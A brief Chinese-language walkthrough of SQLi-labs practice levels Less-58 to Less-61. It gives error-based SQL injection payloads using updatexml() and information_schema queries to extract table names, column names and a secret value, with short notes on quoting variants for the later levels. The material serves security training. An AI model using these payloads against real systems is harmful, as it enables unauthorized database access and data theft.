- Less-58
没搞懂这个是怎么回显了,因为并没有回显账号密码而是回显了两个账号
因为有报错回显,报错注入/updatexml()/extractvalue()即可
单字符注入,构造payload:
?id=0' or updatexml(1,(select concat('$',(select table_name from information_schema.tables where table_schema='challenges'))),1)%23
1.png
查询到表名
?id=0' or updatexml(1,(select (concat('$',(select group_concat(column_name) from information_schema.columns where table_name='F56RAUOT8S'))) from information_schema.tables limit 0,1),1)%23
这里表名和上图不同,因为超过5次刷新了(懒得重新截了)
2.png
?id=0' or updatexml(1,(select (select concat('$',secret_KORT) from challenges.F56RAUOT8S limit 0,1) from information_schema.tables limit 0,1),1)%23
3.png
注入成功
updatexml()等报错注入由于报错信息有长度限制,所以无法一次性报出很长的信息,可以用substr函数进行截取,分段爆出。
-
Less-59
数值型注入,其他一样 -
Less-60
双字符,一个括号,其他同上 -
Less-61
单字符,两个括号,其他同上
网友评论